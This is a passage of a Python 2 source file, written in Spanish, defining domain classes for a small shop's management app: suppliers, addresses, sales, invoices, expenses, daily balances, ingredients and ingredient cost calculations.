__cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.nombre.lower(),\n other.nombre.lower())\n \n @staticmethod\n def data2Object(lstDatos):\n #lstDatos = lstDatosProv[0]\n #lstDatosVendedor = lstDatosProv[1]\n \n prov = Proveedor(lstDatos[NAME_PROV], lstDatos[TELEFONO_PROV], \n lstDatos[CELULAR_PROV], lstDatos[EMAIL_PROV])\n #if lstDatos[FECHA_ALTA]:\n # prov.fecha_alta = lstDatos[FECHA_ALTA]\n \n direccion = Direccion(calle=lstDatos[DIRECCION_PROV],\n altura=lstDatos[ALTURA_PROV], \n barrio=lstDatos[BARRIO_PROV]\n )\n \n if lstDatos[PISO]:\n direccion.piso = lstDatos[PISO_PROV]\n direccion.depto = lstDatos[DEPTO_PROV]\n \n prov.direccion = direccion\n prov.ciudad = lstDatos[CIUDAD_PROV]\n \n if lstDatos[VENDEDOR_PROV]:\n prov.vendedorProv = lstDatos[VENDEDOR_PROV]\n #uCargo el vendedor/contacto\n #prov.vendedorProv = VendedorProv.data2Object(lstDatosVendedor)\n \n return prov\n \n @staticmethod\n def object2Data(prov):\n lstDatosProv = [prov.nombre, prov.email, prov.direccion.calle, \n prov.direccion.barrio, prov.ciudad, \n prov.telefono, prov.celular, \n prov.direccion.altura, prov.direccion.piso,\n prov.direccion.depto, prov.ciudad.provincia, \n prov.fecha_alta, prov.vendedorProv]\n \n #lstDatosVendedorProv = VendedorProv.object2Data(prov.vendedorProv)\n \n return lstDatosProv#[lstDatosProv, lstDatosVendedorProv]\n \n @staticmethod\n def editObject(prov, lstDatos):\n #lstDatosVendedor = lstDatosProv[1]\n \n prov.nombre = lstDatos[NAME]\n\n direccion = Direccion(calle=lstDatos[DIRECCION_PROV],\n altura=lstDatos[ALTURA_PROV], \n barrio=lstDatos[BARRIO_PROV]\n )\n if lstDatos[PISO]:\n direccion.piso = lstDatos[PISO_PROV]\n direccion.depto = lstDatos[DEPTO_PROV]\n \n prov.direccion = direccion\n prov.ciudad = lstDatos[CIUDAD_PROV]\n prov.telefono = lstDatos[TELEFONO_PROV]\n prov.celular = lstDatos[CELULAR_PROV]\n prov.email = lstDatos[EMAIL_PROV]\n \n if lstDatos[VENDEDOR_PROV]:\n prov.vendedorProv = lstDatos[VENDEDOR_PROV]\n #VendedorProv.editObject(prov.vendedorProv, lstDatosVendedor)\n \n @staticmethod\n def type():\n return Proveedor\n\n\nNAME_VEND_PROV, EMAIL_VEND_PROV, DIRECCION_VEND_PROV, BARRIO_VEND_PROV, CIUDAD_VEND_PROV, \\\nTELEFONO_VEND_PROV, CELULAR_VEND_PROV, ALTURA_VEND_PROV, \\\nPISO_VEND_PROV, DEPTO_VEND_PROV, PROVINCIA_VEND_PROV, \\\nFECHA_ALTA_VEND_PROV, PROVEEDOR_VEND = range(13)\nclass VendedorProv(object):\n \n \"\"\"VendedorProv\n \"\"\"\n nombre = \"\"\n direccion = None\n tel = \"\"\n cel = \"\"\n fecha_alta = None\n \n def __init__(self, nombre, telefono=None, celular=None, email=None):\n self.nombre = nombre\n self.telefono = telefono\n self.celular = celular\n self.email = email\n self.fecha_alta = datetime.date.today()\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.nombre.lower(),\n other.nombre.lower())\n \n @staticmethod\n def data2Object(lstDatos):\n prov = VendedorProv(lstDatos[NAME_PROV], lstDatos[TELEFONO_PROV], \n lstDatos[CELULAR_PROV], lstDatos[EMAIL_PROV])\n #if lstDatos[FECHA_ALTA]:\n # prov.fecha_alta = lstDatos[FECHA_ALTA]\n \n direccion = Direccion(calle=lstDatos[DIRECCION_PROV],\n altura=lstDatos[ALTURA_PROV], \n barrio=lstDatos[BARRIO_PROV]\n )\n \n if lstDatos[PISO]:\n direccion.piso = lstDatos[PISO_PROV]\n direccion.depto = lstDatos[DEPTO_PROV]\n \n prov.direccion = direccion\n prov.ciudad = lstDatos[CIUDAD_PROV]\n \n return prov\n \n @staticmethod\n def object2Data(prov):\n return [prov.nombre, prov.email, prov.direccion.calle, \n prov.direccion.barrio, prov.ciudad, \n prov.telefono, prov.celular, \n prov.direccion.altura, prov.direccion.piso,\n prov.direccion.depto, prov.ciudad.provincia, \n prov.fecha_alta, prov.proveedor]\n \n @staticmethod\n def editObject(prov, lstDatos):\n prov.nombre = lstDatos[NAME]\n\n direccion = Direccion(calle=lstDatos[DIRECCION_PROV],\n altura=lstDatos[ALTURA_PROV], \n barrio=lstDatos[BARRIO_PROV]\n )\n if lstDatos[PISO]:\n direccion.piso = lstDatos[PISO_PROV]\n direccion.depto = lstDatos[DEPTO_PROV]\n \n prov.direccion = direccion\n prov.ciudad = lstDatos[CIUDAD_PROV]\n prov.telefono = lstDatos[TELEFONO_PROV]\n prov.celular = lstDatos[CELULAR_PROV]\n prov.email = lstDatos[EMAIL_PROV]\n \n @staticmethod\n def type():\n return VendedorProv\n \n\nNAME_PROV, = range(1)\nclass Provincia(object):\n u\"\"\"Clase que representa una provincia.\"\"\"\n\n def __init__(self, nombre):\n self.nombre = nombre\n\n def __str__(self):\n return '{}'.format(self.nombre)\n \n @staticmethod\n def data2Object(lstDatos):\n prov = Proveedor(lstDatos[NAME])\n return prov\n \n @staticmethod\n def object2Data(prov):\n return [prov.name, ]\n \n @staticmethod\n def editObject(prov, lstDatos):\n prov.nombre = lstDatos[NAME_PROV]\n \n @staticmethod\n def type():\n return Provincia\n \nNAME_CIUDAD, COD_POSTAL, DDN = range(3) \nclass Ciudad(object):\n u\"\"\"Clase que representa una ciudad.\"\"\"\n\n def __init__(self, nomCiudad, codPostal, DDN):\n self.nomCiudad = nomCiudad\n self.codPostal = codPostal\n self.DDN = DDN\n\n def __str__(self):\n return u'{0}'.format(self.nomCiudad)\n \n @staticmethod\n def data2Object(lstDatos):\n ciudad = Ciudad(lstDatos[NAME_CIUDAD], lstDatos[COD_POSTAL], \n lstDatos[DDN])\n return ciudad\n \n @staticmethod\n def object2Data(ciudad):\n return [ciudad.nomCiudad, ciudad.codPostal, ciudad.DDN]\n \n @staticmethod\n def editObject(ciudad, lstDatos):\n ciudad.nomCiudad = lstDatos[NAME_CIUDAD]\n ciudad.codPostal = lstDatos[COD_POSTAL]\n ciudad.DDN = lstDatos[DDN]\n \n @staticmethod\n def type():\n return Ciudad\n\nCALLE, ALTURA, PISO, DEPTO, BARRIO = range(5) \nclass Direccion(object):\n u\"\"\"Clase que representa una dirección física.\"\"\"\n\n def __init__(self, calle, altura, piso=None, depto=None, barrio=None):\n self.calle = calle\n self.altura = altura\n self.piso = piso\n self.depto = depto\n self.barrio = barrio\n\n def __str__(self):\n return '{0} {1}'.format(self.calle, self.altura)\n \n @staticmethod\n def data2Object(lstDatos):\n direc = Direccion(lstDatos[CALLE], lstDatos[ALTURA], lstDatos[PISO], \n lstDatos[DEPTO], lstDatos[BARRIO])\n return direc\n \n @staticmethod\n def object2Data(direc):\n return [direc.calle, direc.altura, direc.piso, \n direc.depto, direc.barrio]\n \n @staticmethod\n def editObject(direc, lstDatos):\n direc.calle = lstDatos[CALLE]\n direc.altura = lstDatos[ALTURA]\n direc.piso = lstDatos[PISO]\n direc.depto = lstDatos[DEPTO]\n direc.barrio = lstDatos[BARRIO]\n \n @staticmethod\n def type():\n return Direccion\n \nNOMBRE_EGRESO, = range(1)\nclass Egreso(object): \n u\"\"\"Egreso\n \"\"\" \n def __init__(self, nombre):\n self.nombre = nombre\n \n def __str__(self):\n return '{}'.format(self.nombre)\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.nombre.lower(),\n other.nombre.lower())\n \n @staticmethod\n def data2Object(lstDatos):\n egreso = Egreso(lstDatos[NOMBRE_EGRESO])\n return egreso\n \n @staticmethod\n def object2Data(egreso):\n return [egreso.nombre, ]\n \n @staticmethod\n def editObject(egreso, lstDatos):\n egreso.nombre = lstDatos[NOMBRE_EGRESO]\n \n @staticmethod\n def type():\n return Egreso\n \nVALOR_EGRESO, NOM_EGRESO, FECHA_EGRESO = range(3)\nclass MovEgreso(object):\n \"\"\"Clase que representa el movimiento diario de egresos.\"\"\"\n \n total = 0.0\n \n def __init__(self, saldo_parcial, egreso, fecha):\n self.saldo_parcial = saldo_parcial\n self.egreso = egreso\n self.fecha = fecha\n self.total = 0.0\n \n def setSaldoParcial(self, saldo_parcial):\n self.saldo_parcial = saldo_parcial\n \n def calcularSubtotal(self):\n return self.saldo_parcial\n \n def calcularTotal(self):\n self.total = 0.0\n self.total += self.saldo_parcial\n \n return self.total\n \n def __str__(self):\n return '{}'.format(self.egreso.nombre)\n \n @staticmethod\n def data2Object(lstDatos):\n mov_egreso = MovEgreso(lstDatos[VALOR_EGRESO], lstDatos[NOM_EGRESO], \n lstDatos[FECHA_EGRESO])\n return mov_egreso\n \n @staticmethod\n def object2Data(mov_egreso):\n return [mov_egreso.valor, mov_egreso.egreso, mov_egreso.fecha]\n \n @staticmethod\n def editObject(mov_egreso, lstDatos):\n mov_egreso.valor = lstDatos[VALOR_EGRESO]\n mov_egreso.egreso = lstDatos[NOM_EGRESO]\n mov_egreso.fecha = lstDatos[FECHA_EGRESO]\n @staticmethod\n def type():\n return MovEgreso\n \nNOMBRE_VEND, ES_VENDEDOR = range(2)\nclass Vendedor(object):\n u\"\"\"Vendedor\n \"\"\"\n TIPO = 'vendedor'\n \n def __init__(self, nombre):\n self.nombre = nombre\n self.tipo = Vendedor.TIPO\n \n def __str__(self):\n return '{}'.format(self.nombre)\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.nombre.lower(),\n other.nombre.lower())\n \n @staticmethod\n def data2Object(lstDatos):\n vend = None\n if lstDatos[ES_VENDEDOR]:\n vend = VendedorExterno(lstDatos[NOMBRE_VEND])\n else:\n vend = VendedorInterno(lstDatos[NOMBRE_VEND])\n return vend\n \n @staticmethod\n def object2Data(vend):\n is_vendedor = False\n if isinstance(vend, VendedorExterno):\n is_vendedor = True\n \n return [vend.nombre, is_vendedor]\n \n @staticmethod\n def editObject(vend, lstDatos):\n vend.nombre = lstDatos[NOMBRE_VEND]\n vend.tipo = VendedorExterno.TIPO if lstDatos[ES_VENDEDOR] else \\\n VendedorInterno.TIPO\n \n @staticmethod\n def type():\n return Vendedor\n \nNOM_VENDEDOR_EXTERNO, = range(1)\nclass VendedorExterno(Vendedor):\n u\"\"\"VendedorExterno\n \"\"\"\n TIPO = 'vendedor_ext'\n \n def __init__(self, nombre):\n super(VendedorExterno, self).__init__(nombre)\n self.tipo = VendedorExterno.TIPO\n \n def __str__(self):\n return '{}'.format(self.nombre)\n \n @staticmethod\n def data2Object(lstDatos):\n vend = VendedorExterno(lstDatos[NOMBRE_VEND])\n return vend\n \n @staticmethod\n def object2Data(vend):\n return [vend.nombre, ]\n \n @staticmethod\n def editObject(vend, lstDatos):\n vend.nombre = lstDatos[NOMBRE_VEND]\n \n @staticmethod\n def type():\n return VendedorExterno\n \nNOM_VENDEDOR_INTERNO, = range(1)\nclass VendedorInterno(Vendedor):\n u\"\"\"VendedorInterno\n \"\"\"\n TIPO = 'vendedor_int'\n \n def __init__(self, nombre):\n super(VendedorInterno, self).__init__(nombre)\n self.tipo = VendedorInterno.TIPO\n \n def __str__(self):\n return '{}'.format(self.nombre)\n @staticmethod\n def type():\n return VendedorInterno\n \nVALOR_VENTA, VENDEDOR, FECHA_VENTA, SALDO_PARCIAL_VENTA, SUBTOTAL_VENTA = range(5)\nclass Venta(object):\n u\"\"\"Venta\n \"\"\"\n \n subtotal = 0.0\n total = 0.0\n \n def __init__(self, saldo_parcial, vendedor, fecha):\n self.saldo_parcial = saldo_parcial\n self.vendedor = vendedor\n self.fecha = fecha \n self.subtotal = 0.0\n \n def __str__(self):\n return '{}'.format(self.vendedor.nombre)\n \n def setSaldoParcial(self, saldo_parcial):\n self.saldo_parcial = saldo_parcial\n if isinstance(self.vendedor, VendedorInterno):\n self.subtotal = 0.0\n self.subtotal += self.saldo_parcial\n \n def addVentaProd(self, ventaProd):\n if ventaProd in self.colVentasProd:\n return False\n\n self.colVentasProd.append(ventaProd)\n return True\n \n def delVentaProd(self, i):\n del self.colVentasProd[i]\n \n def calcular(self):\n self.subtotal = 0.0\n for ventaProd in self.colVentasProd:\n ventaProd.calcular()\n self.subtotal += ventaProd.costo\n \n return self.subtotal\n \n def calcularSubtotal(self):\n if isinstance(self.vendedor, VendedorInterno):\n return self.saldo_parcial\n return self.subtotal\n \n def calcularSaldo(self):\n self.subtotal = 0.0\n for ventaProd in self.colVentasProd:\n ventaProd.setPrecioUnitario(self.fecha)\n ventaProd.totVentas()\n ventaProd.calcular()\n self.subtotal += ventaProd.costo\n return self.subtotal\n \n def calcularTotal(self):\n self.total = 0.0\n \n if isinstance(self.vendedor, VendedorInterno):\n self.total += self.saldo_parcial\n else:\n self.total = self.saldo_parcial + self.subtotal\n \n #print('TOTAL_:', self.total)\n return self.total\n \n @staticmethod\n def data2Object(lstDatos):\n venta = Venta(lstDatos[VALOR_VENTA], \n lstDatos[VENDEDOR],\n lstDatos[FECHA_VENTA])\n return venta\n \n @staticmethod\n def object2Data(venta):\n return [venta.valor, venta.vendedor, venta.fecha, \n venta.saldo_parcial, venta.subtotal]\n \n @staticmethod\n def editObject(venta, lstDatos):\n venta.vendedor = lstDatos[VENDEDOR]\n venta.valor = lstDatos[VALOR_VENTA]\n venta.fecha = lstDatos[FECHA_VENTA]\n venta.saldo_parcial = lstDatos[SALDO_PARCIAL_VENTA]\n \n @staticmethod\n def type():\n return Venta\n \nVALOR_VENTA, VENDEDOR, FECHA_VENTA, SALDO_PARCIAL_VENTA, SUBTOTAL_VENTA = range(5)\nclass Factura(object):\n u\"\"\"Factura\n \"\"\"\n num_factura = 0\n subtotal = 0.0\n total = 0.0\n con_cinco_por_ciento_descuento = False\n con_iva = False\n \n def __init__(self, vendedor, fecha):\n self.vendedor = vendedor\n self.fecha = fecha \n self.subtotal = 0.0\n \n def __str__(self):\n return '{}'.format(self.vendedor.nombre)\n \n def setSaldoParcial(self, saldo_parcial):\n self.saldo_parcial = saldo_parcial\n if isinstance(self.vendedor, VendedorInterno):\n self.subtotal = 0.0\n self.subtotal += self.saldo_parcial\n \n def addVentaProd(self, ventaProd):\n if ventaProd in self.colVentasProd:\n return False\n\n self.colVentasProd.append(ventaProd)\n return True\n \n def delVentaProd(self, i):\n del self.colVentasProd[i]\n \n def calcular(self):\n self.subtotal = 0.0\n for ventaProd in self.colVentasProd:\n ventaProd.calcular()\n self.subtotal += ventaProd.costo\n \n return self.subtotal\n \n def calcularSubtotal(self):\n if isinstance(self.vendedor, VendedorInterno):\n return self.saldo_parcial\n return self.subtotal\n \n def calcularSaldo(self):\n self.subtotal = 0.0\n for ventaProd in self.colVentasProd:\n ventaProd.setPrecioUnitario(self.fecha)\n ventaProd.totVentas()\n ventaProd.calcular()\n self.subtotal += ventaProd.costo\n return self.subtotal\n \n def calcularTotal(self):\n self.total = 0.0\n \n if isinstance(self.vendedor, VendedorInterno):\n self.total += self.saldo_parcial\n else:\n self.total = self.saldo_parcial + self.subtotal\n \n #print('TOTAL_:', self.total)\n return self.total\n \n @staticmethod\n def data2Object(lstDatos):\n venta = Venta(lstDatos[VENDEDOR],\n lstDatos[FECHA_VENTA])\n return venta\n \n @staticmethod\n def object2Data(venta):\n return [venta.valor, venta.vendedor, venta.fecha, \n venta.saldo_parcial, venta.subtotal]\n \n @staticmethod\n def editObject(venta, lstDatos):\n venta.vendedor = lstDatos[VENDEDOR]\n venta.fecha = lstDatos[FECHA_VENTA]\n \n @staticmethod\n def type():\n return Factura\n\n\nFECHA_SALDO, = range(1)\nclass SaldoDiario(object):\n u\"\"\" Saldo diario\n \"\"\"\n saldo_egresos = 0.0\n saldo_ventas_parcial = 0.0\n \n saldo_ventas_subtotal = 0.0\n saldo_tot_ventas = 0.0\n \n saldo_neto = 0.0\n saldo_parcial = 0.0\n \n def __init__(self, fecha_saldo):\n self.fecha_saldo = fecha_saldo\n \n def saldoEgresos(self):\n self.saldo_egresos = 0.0\n for mov in self.colMovEgresos:\n self.saldo_egresos += mov.saldo_parcial\n \n return self.saldo_egresos\n \n def saldoParcial(self):\n self.saldo_ventas_parcial = 0.0\n for venta in self.colVentas:\n #print('VENTA_SALDO:', venta.saldo_parcial)\n self.saldo_ventas_parcial += venta.saldo_parcial\n #print('SALDO:PARCIAL:', self.saldo_ventas_parcial)\n return self.saldo_ventas_parcial\n \n def saldoVentasSubtotal(self):\n self.saldo_ventas_subtotal = 0.0\n for venta in self.colVentas:\n if isinstance(venta.vendedor, VendedorExterno):\n self.saldo_ventas_subtotal += venta.subtotal\n \n print('SUBTOTAL:', self.saldo_ventas_subtotal) \n return self.saldo_ventas_subtotal\n \n def saldoTotalVentas(self):\n self.saldo_tot_ventas = self.saldo_ventas_parcial + self.saldo_ventas_subtotal\n return self.saldo_tot_ventas\n \n \n def saldo(self):\n self.saldo_neto = self.saldo_ventas_parcial + self.saldo_ventas_subtotal - self.saldo_egresos\n return self.saldo_neto\n \n @staticmethod\n def data2Object(lstDatos):\n saldo = SaldoDiario(lstDatos[FECHA_SALDO])\n return saldo\n \n @staticmethod\n def object2Data(saldo):\n return [saldo.fecha_saldo, ]\n \n @staticmethod\n def editObject(saldo, lstDatos):\n saldo.fecha_saldo = lstDatos[FECHA_SALDO]\n \n @staticmethod\n def type():\n return SaldoDiario\n \nPROD, CANT_INICIAL, DEVOLUCIONES = range(3)\nclass VentaProd(object):\n u\"\"\"Venta producto\n \"\"\"\n \n CANT_CARGAS = 6\n precio_unitario = 0.0\n costo = 0.0\n tot_venta = 0\n cant_neta = 0\n \n def __init__(self, producto, cant_inicial=0, devoluciones=0, \n fecha_ingreso=datetime.date.today()):\n self.setProducto(producto)\n self.cant_inicial = cant_inicial\n self.devoluciones = devoluciones\n \n def setProducto(self, producto, fecha_ingreso=datetime.date.today()):\n self.producto = producto\n self.setPrecioUnitario(fecha_ingreso)\n \n def setDevoluciones(self, devoluciones):\n if devoluciones > self.tot_venta:\n return False\n else:\n self.devoluciones = devoluciones\n return True\n \n def setPrecioUnitario(self, fecha_ingreso): \n self.precio_unitario = round(self.producto.precioActivo(fecha_ingreso), 2)\n \n def totVentas(self):\n tot = 0.0\n for i in xrange(VentaProd.CANT_CARGAS):\n tot = tot + self.colCargaProd[i].cant\n \n self.tot_venta = tot\n \n return self.tot_venta\n \n def cantNeta(self):\n self.cant_neta = self.tot_venta - self.devoluciones\n \n return self.cant_neta\n \n def calcular(self):\n self.costo = round(self.precio_unitario * float((self.tot_venta - self.devoluciones)), 2)\n \n return self.costo\n \n @staticmethod\n def data2Object(lstDatos):\n ventaProd = VentaProd(lstDatos[PROD], \n lstDatos[CANT_INICIAL], \n lstDatos[DEVOLUCIONES])\n \n colCargaProd = []\n \n for i in range(VentaProd.CANT_CARGAS):\n cargaProd = CargaProd()\n colCargaProd.append(cargaProd)\n \n ventaProd.colCargaProd = colCargaProd\n \n return ventaProd\n \n @staticmethod\n def object2Data(ventaProd):\n return [ventaProd.producto, ventaProd.cant_inicial, \n ventaProd.devoluciones]\n \n @staticmethod\n def editObject(ventaProd, lstDatos):\n ventaProd.producto = lstDatos[PROD]\n ventaProd.cant_inicial = lstDatos[CANT_INICIAL]\n ventaProd.devoluciones = lstDatos[DEVOLUCIONES]\n \n @staticmethod\n def type():\n return VentaProd\n\nCANT, FECHA_HORA = range(2)\nclass CargaProd(object):\n u\"\"\"Carga producto\n \"\"\"\n \n def __init__(self, cant=0.0, fecha_hora=datetime.date.today()):\n self.cant = cant\n self.fecha_hora = fecha_hora\n \n @staticmethod\n def data2Object(lstDatos):\n cargaProd = CargaProd(lstDatos[CANT], \n lstDatos[FECHA_HORA])\n return cargaProd\n \n @staticmethod\n def object2Data(cargaProd):\n return [cargaProd.cant, cargaProd.fecha_hora]\n \n @staticmethod\n def editObject(cargaProd, lstDatos):\n cargaProd.cant = lstDatos[CANT]\n cargaProd.fecha_hora = lstDatos[FECHA_HORA]\n \n @staticmethod\n def type():\n return CargaProd\n\n#FECHA_MOV_VENTA_PROD = range(1)\n#class MovVentaProd(object):\n# pass\n# \"\"\"Clase que representa el movimiento de la venta diaria detallada.\"\"\"\n \n # total = 0.0\n \n # def __init__(self, fecha=datetime.date.today()):\n # self.fecha = fecha\n # \n #def __str__(self):\n # return '{}'.format(self.vendedor.nombre)\n \n #def addVentaProd(self, ventaProd):\n # if ventaProd in self.colVentasProd:\n # return False\n\n # self.colVentasProd.append(ventaProd)\n #return True\n \n #def delVentaProd(self, i):\n # del self.colVentasProd[i]\n \n #def calcular(self):\n # self.total = 0.0\n # for ventaProd in self.colVentasProd:\n # ventaProd.calcular()\n # self.total += ventaProd.costo\n \n #return self.total\n \n #def calcularSaldo(self):\n # self.total = 0.0\n # for ventaProd in self.colVentasProd:\n # ventaProd.setPrecioUnitario(self.fecha)\n # ventaProd.totVentas()\n # ventaProd.calcular()\n # self.total += ventaProd.costo\n #return self.total\n \n #@staticmethod\n #def data2Object(lstDatos):\n # mov_venta = MovVentaProd(lstDatos[FECHA_MOV_VENTA_PROD])\n # return mov_venta\n \n #@staticmethod\n #def object2Data(mov_venta):\n # return [mov_venta.fecha, ]\n \n #@staticmethod\n #def editObject(mov_venta, lstDatos):\n # mov_venta.fecha = lstDatos[FECHA_MOV_VENTA_PROD]\n \n #@staticmethod\n #def type():\n # return MovVentaProd\n \nPROM_VENTA_RF, CANT_PERS_RF, CAJA_ABAJO_RF, FECHA_RF = range(4)\nclass ResumenFiscal(object):\n u\"\"\"Clase que representa un resumen fiscal.\"\"\"\n\n cant_pers_abajo = 0\n \n def __init__(self, prom_venta, cant_pers, caja_abajo, fecha):\n self.prom_venta = prom_venta\n self.cant_pers = cant_pers\n self.caja_abajo = caja_abajo\n self.fecha = fecha\n self.cant_pers_abajo = 0\n\n def __str__(self):\n return '{}-{}'.format(self.prom_venta)\n \n @staticmethod\n def data2Object(lstDatos):\n rf = ResumenFiscal(lstDatos[PROM_VENTA_RF], lstDatos[CANT_PERS_RF], \n lstDatos[CAJA_ABAJO_RF], lstDatos[FECHA_RF])\n return rf\n \n @staticmethod\n def object2Data(rf):\n return [rf.prom_venta, rf.cant_pers, \n rf.caja_abajo, rf.fecha]\n \n @staticmethod\n def editObject(rf, lstDatos):\n rf.prom_venta = lstDatos[PROM_VENTA_RF]\n rf.cant_pers = lstDatos[CANT_PERS_RF]\n rf.caja_abajo = lstDatos[CAJA_ABAJO_RF]\n rf.fecha = lstDatos[FECHA_RF]\n \n @staticmethod\n def type():\n return ResumenFiscal\n \nNOM_INGRED, PRECIO_INGREDIENTE, UNIDAD_INGRED, CANT_UNIDAD_INGRED = range(4)\nclass Ingrediente(object):\n \"\"\"Clase que representa un ingrediente.\"\"\"\n \n UNIDAD_KG = 0\n UNIDAD_LTS = 1\n UNIDAD_OTROS = 2\n \n CANT_UNIDAD_KG_LTS = -1\n CANT_UNIDAD_KG_LTS_X1 = 0\n \n LST_UNIDADES = [u'Kg.', u'Lts.', u'Unidades']\n LST_MULTIPLO_UND = ['grs.', 'cm3', 'und.']\n LST_CANT_UNIDADADES = [1000, 1]#Equivalencias por kilo/litro o gramo/cm3.\n \n precio = 0.0\n \n def __init__(self, nombre, unidad=UNIDAD_KG, cantUnidad=CANT_UNIDAD_KG_LTS):\n self.nombre = nombre\n self.unidad = unidad\n self.cantUnidad = cantUnidad\n \n def __cmp__(self, other):\n return _qc.QString.localeAwareCompare(self.nombre.lower(),\n other.nombre.lower())\n \n def precioActivo(self, fecha_precio=datetime.date.today()):\n lstPrecios = set()\n \n #print('FECHA_FILTRO:', fecha_precio)\n #if self.id == 1:\n # for precio_guardado in self.colPrecioIngred:\n # print(precio_guardado)\n #print('MAX_PRECIO:', max(self.colPrecioIngred))\n \n for precio_guardado in self.colPrecioIngred:\n if precio_guardado.fecha_ingreso <= fecha_precio:\n lstPrecios.add(precio_guardado)\n \n if len(lstPrecios) > 0:\n self.precio = max(lstPrecios).precio\n else: \n self.precio = 0.0#self.precio = min(self.colPrecioIngred).precio\n \n return self.precio\n \n def __str__(self):\n return '{}'.format(self.nombre)\n \n @staticmethod\n def data2Object(lstDatos):\n ingred = Ingrediente(lstDatos[NOM_INGRED], \n lstDatos[UNIDAD_INGRED], lstDatos[CANT_UNIDAD_INGRED])\n \n ingred.precio = lstDatos[PRECIO_INGREDIENTE]\n \n precioIngred = PrecioIngred(lstDatos[PRECIO_INGREDIENTE], datetime.date.today())\n ingred.colPrecioIngred.append(precioIngred)\n \n return ingred\n \n @staticmethod\n def object2Data(ingred):\n #for pre in ingred.colPrecioIngred:\n # print(pre.precio)\n precio = 0.0\n if len(ingred.colPrecioIngred) > 0:\n precio = ingred.colPrecioIngred[len(ingred.colPrecioIngred) - 1].precio\n \n return [ingred.nombre, precio, \n ingred.unidad, ingred.cantUnidad]\n \n @staticmethod\n def editObject(ingred, lstDatos):\n ingred.nombre= lstDatos[NOM_INGRED]\n ingred.precio = lstDatos[PRECIO_INGRED]\n ingred.unidad = lstDatos[UNIDAD_INGRED]\n ingred.cantUnidad = lstDatos[CANT_UNIDAD_INGRED]\n \n precioIngred = PrecioIngred(lstDatos[PRECIO_INGREDIENTE], datetime.date.today())\n ingred.colPrecioIngred.append(precioIngred)\n \n @staticmethod\n def type():\n return Ingrediente\n \nINGRED, CANT_INGRED, FECHA_INGRESO_COSTO, PRECIO_INGRED_COSTO = range(4)\nclass MovCostoIngred(object):\n u\"\"\"Clase que representa el costo de un ingrediente.\"\"\"\n \n precio_unitario = 0.0\n costo = 0.0\n \n def __init__(self, ingrediente, cant, \n fecha_ingreso=datetime.date.today()\n ):\n self.setIngrediente(ingrediente, fecha_ingreso)\n self.cant = cant\n #self.fechaIngreso = fechaIngreso\n #self.precio_ingred = precio_ingred\n #self.ingrediente.precio = precio_ingred\n \n def copy(self):\n movCostoIngred = MovCostoIngred(self.ingrediente, self.cant)\n \n return movCostoIngred\n\n def setIngrediente(self, ingred, fecha_ingreso=datetime.date.today()):\n self.ingrediente = ingred\n self.setPrecioUnitario(fecha_ingreso)\n \n def setPrecioUnitario(self, fecha_ingreso): \n self.precio_unitario = round(self.ingrediente.precioActivo(fecha_ingreso), 2)\n \n def calcular(self):\n #print(self.cant, self.ingrediente.cantUnidad, self.precio_unitario, \n # round(self.cant/float(self.ingrediente.cantUnidad) * self.precio_unitario, 2))\n cant_unidad = self.ingrediente.cantUnidad\n \n if cant_unidad <= Ingrediente.CANT_UNIDAD_KG_LTS_X1:\n cant_unidad = Ingrediente.LST_CANT_UNIDADADES[cant_unidad + 1]\n \n #self.costo = round(self.cant/float(self.ingrediente.cantUnidad) * self.precio_unitario, 2)\n self.costo = round(self.cant/float(cant_unidad) * self.precio_unitario, 2)\n return self.costo\n \n def __str__(self):\n return '{}-{}'.format(self.ingrediente, self.cant)\n \n @staticmethod\n def data2Object(lstDatos):\n movCostoProd = MovCostoIngred(lstDatos[INGRED, CANT_INGRED])\n if len(lstDatos) > 2 and lstDatos[FECHA_INGRESO_COSTO]:\n movCostoProd.fechaIngreso = lstDatos[FECHA_INGRESO_COSTO]\n movCostoProd.precio_ingred = lstDatos[PRECIO_INGRED_COSTO]\n return movCostoProd\n \n @staticmethod\n def object2Data(movCostoProd):\n return [movCostoProd.ingrediente, movCostoProd.cant, \n movCostoProd.fechaIngreso, movCostoProd.precio_ingred]\n \n @staticmethod\n def editObject(movCostoProd, lstDatos):\n movCostoProd.ingrediente= lstDatos[INGRED]\n movCostoProd.cant = lstDatos[PRECIO_INGRED_COSTO]\n movCostoProd.fechaIngreso = lstDatos[FECHA_INGRESO_COSTO]\n movCostoProd.precio_ingred = lstDatos[PRECIO_INGRED_COSTO]\n \n @staticmethod\n def type():\n return MovCostoIngred\n\nFECHA_COSTO_X, GASTOS_COSTO_X, CANTIDAD_PROD_X, DESC_COSTO_X = range(4)\nclass CostoProd(object):\n u\"\"\"Clase que representa el costo de un producto.\"\"\"\n \n def __init__(self, producto, fecha_ingreso=datetime.date.today(), gastos=0.0, cant=0):\n self.producto = producto\n self.fecha_ingreso = fecha_ingreso\n self.gastos = gastos\n self.cant = cant\n self.total = 0.0\n self.desc = ''\n \n def addMovCosto(self, movCosto):\n if movCosto in self.colMovCostoIngred:\n return False\n\n self.colMovCostoIngred.append(movCosto)\n \n return True\n \n def delMovCosto(self, i):\n del self.colMovCostoIngred[i]\n \n def calcular(self):\n self.total = 0.0\n for mov in self.colMovCostoIngred:\n mov.calcular()\n self.total += mov.costo\n \n \n def __str__(self):\n #return '{}-{}'.format(self.producto, self.cant)\n return '{}'.format(self.fecha_ingreso)\n \n @staticmethod\n def data2Object(lstDatos):\n costoProd = CostoProd(lstDatos[FECHA_COSTO_X], lstDatos[GASTOS_COSTO_X], \n lstDatos[CANTIDAD_PROD_X])\n \n costoProd.desc = lstDatos[DESC_COSTO_X]\n \n return costoProd\n \n @staticmethod\n def object2Data(costoProd):\n return [costoProd.fecha_ingreso, costoProd.gastos, \n costoProd.cant, costoProd.desc]\n \n @staticmethod\n def editObject(costoProd, lstDatos):\n costoProd.ingrediente= lstDatos[FECHA_COSTO_X]\n costoProd.cant = lstDatos[GASTOS_COSTO_X]\n costoProd.fechaIngreso = lstDatos[CANTIDAD_PROD_X]\n costoProd.desc = lstDatos[DESC_COSTO_X]\n \n @staticmethod\n def type():\n return CostoProd\n \nPRECIO_INGRED, FECHA_INGRESO_INGRED = range(2)\nclass PrecioIngred(object):\n u\"\"\"Clase que representa el precio de un ingrediente.\"\"\"\n \n def __init__(self, precio, fecha_ingreso):\n self.precio = precio\n self.fecha_ingreso = fecha_ingreso\n \n def __str__(self):\n return '{}-{}'.format(self.precio, self.fecha_ingreso)\n \n @staticmethod\n def data2Object(lstDatos):\n 